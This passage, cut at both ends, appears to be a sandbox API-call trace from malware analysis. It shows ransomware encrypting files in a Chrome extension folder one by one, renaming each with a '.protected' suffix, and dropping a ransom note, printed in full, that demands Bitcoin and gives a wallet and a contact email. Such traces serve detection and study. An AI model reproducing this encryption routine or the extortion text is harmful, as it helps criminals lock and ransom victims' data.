StrStrW (lpFirst="view.js", lpSrch=".rar") returned 0x0 [0083.222] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js") returned 166 [0083.222] StrStrW (lpFirst="view.js", lpSrch=".zip") returned 0x0 [0083.222] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x945, lpOverlapped=0x0) returned 1 [0083.234] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffff6bb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.234] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x945, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x945, lpOverlapped=0x0) returned 1 [0083.234] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.234] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0083.234] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0083.234] CloseHandle (hObject=0x164) returned 1 [0083.234] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.protected") returned 176 [0083.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.protected")) returned 1 [0083.235] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0083.235] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0083.236] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\RESTORE_FILES.txt") returned 176 [0083.236] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.238] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.238] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0083.239] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.239] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0083.239] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.239] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0083.239] CloseHandle (hObject=0x160) returned 1 [0083.239] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.239] lstrcmpiW (lpString1="common.js", lpString2="Windows") returned -1 [0083.239] lstrcmpiW (lpString1="common.js", lpString2="Program Files") returned -1 [0083.239] lstrcmpiW (lpString1="common.js", lpString2="Program Files (x86)") returned -1 [0083.239] lstrcmpiW (lpString1="common.js", lpString2="$Recycle.bin") returned 1 [0083.239] lstrcmpiW (lpString1="common.js", lpString2="System Volume Information") returned -1 [0083.239] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js") returned 148 [0083.239] StrStrIW (lpFirst="common.js", lpSrch=".protected") returned 0x0 [0083.239] lstrcmpW (lpString1="common.js", lpString2="RESTORE_FILES.txt") returned -1 [0083.239] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.239] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js") returned 148 [0083.240] StrStrW (lpFirst="common.js", lpSrch=".txt") returned 0x0 [0083.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js") returned 148 [0083.240] StrStrW (lpFirst="common.js", lpSrch=".rar") returned 0x0 [0083.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js") returned 148 [0083.240] StrStrW (lpFirst="common.js", lpSrch=".zip") returned 0x0 [0083.240] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.247] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.247] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.248] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.248] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.248] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.248] CloseHandle (hObject=0x160) returned 1 [0083.248] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.protected") returned 158 [0083.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\common.js.protected")) returned 1 [0083.249] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.249] lstrcmpiW (lpString1="feedback.css", lpString2="Windows") returned -1 [0083.249] lstrcmpiW (lpString1="feedback.css", lpString2="Program Files") returned -1 [0083.249] lstrcmpiW (lpString1="feedback.css", lpString2="Program Files (x86)") returned -1 [0083.249] lstrcmpiW (lpString1="feedback.css", lpString2="$Recycle.bin") returned 1 [0083.249] lstrcmpiW (lpString1="feedback.css", lpString2="System Volume Information") returned -1 [0083.249] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css") returned 151 [0083.249] StrStrIW (lpFirst="feedback.css", lpSrch=".protected") returned 0x0 [0083.249] lstrcmpW (lpString1="feedback.css", lpString2="RESTORE_FILES.txt") returned -1 [0083.249] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.249] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.250] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css") returned 151 [0083.250] StrStrW (lpFirst="feedback.css", lpSrch=".txt") returned 0x0 [0083.250] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css") returned 151 [0083.250] StrStrW (lpFirst="feedback.css", lpSrch=".rar") returned 0x0 [0083.250] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css") returned 151 [0083.250] StrStrW (lpFirst="feedback.css", lpSrch=".zip") returned 0x0 [0083.250] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0xc26, lpOverlapped=0x0) returned 1 [0083.251] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffff3da, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.252] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xc26, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0xc26, lpOverlapped=0x0) returned 1 [0083.252] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.252] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.252] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.252] CloseHandle (hObject=0x160) returned 1 [0083.252] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.protected") returned 161 [0083.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.css.protected")) returned 1 [0083.253] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.253] lstrcmpiW (lpString1="feedback.html", lpString2="Windows") returned -1 [0083.253] lstrcmpiW (lpString1="feedback.html", lpString2="Program Files") returned -1 [0083.253] lstrcmpiW (lpString1="feedback.html", lpString2="Program Files (x86)") returned -1 [0083.253] lstrcmpiW (lpString1="feedback.html", lpString2="$Recycle.bin") returned 1 [0083.253] lstrcmpiW (lpString1="feedback.html", lpString2="System Volume Information") returned -1 [0083.253] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html") returned 152 [0083.253] StrStrIW (lpFirst="feedback.html", lpSrch=".protected") returned 0x0 [0083.253] lstrcmpW (lpString1="feedback.html", lpString2="RESTORE_FILES.txt") returned -1 [0083.253] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.253] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.254] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html") returned 152 [0083.254] StrStrW (lpFirst="feedback.html", lpSrch=".txt") returned 0x0 [0083.254] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html") returned 152 [0083.254] StrStrW (lpFirst="feedback.html", lpSrch=".rar") returned 0x0 [0083.254] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html") returned 152 [0083.254] StrStrW (lpFirst="feedback.html", lpSrch=".zip") returned 0x0 [0083.254] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.258] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.258] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0083.258] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.258] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0083.259] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0083.259] CloseHandle (hObject=0x160) returned 1 [0083.259] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.protected") returned 162 [0083.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.protected")) returned 1 [0083.260] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0083.260] lstrcmpiW (lpString1="feedback_script.js", lpString2="Windows") returned -1 [0083.260] lstrcmpiW (lpString1="feedback_script.js", lpString2="Program Files") returned -1 [0083.260] lstrcmpiW (lpString1="feedback_script.js", lpString2="Program Files (x86)") returned -1 [0083.260] lstrcmpiW (lpString1="feedback_script.js", lpString2="$Recycle.bin") returned 1 [0083.260] lstrcmpiW (lpString1="feedback_script.js", lpString2="System Volume Information") returned -1 [0083.260] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js") returned 157 [0083.260] StrStrIW (lpFirst="feedback_script.js", lpSrch=".protected") returned 0x0 [0083.260] lstrcmpW (lpString1="feedback_script.js", lpString2="RESTORE_FILES.txt") returned -1 [0083.260] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0083.260] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0083.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0083.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js") returned 157 [0083.261] StrStrW (lpFirst="feedback_script.js", lpSrch=".txt") returned 0x0 [0083.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback_script.js") returned 157 [0083.261] StrStrW 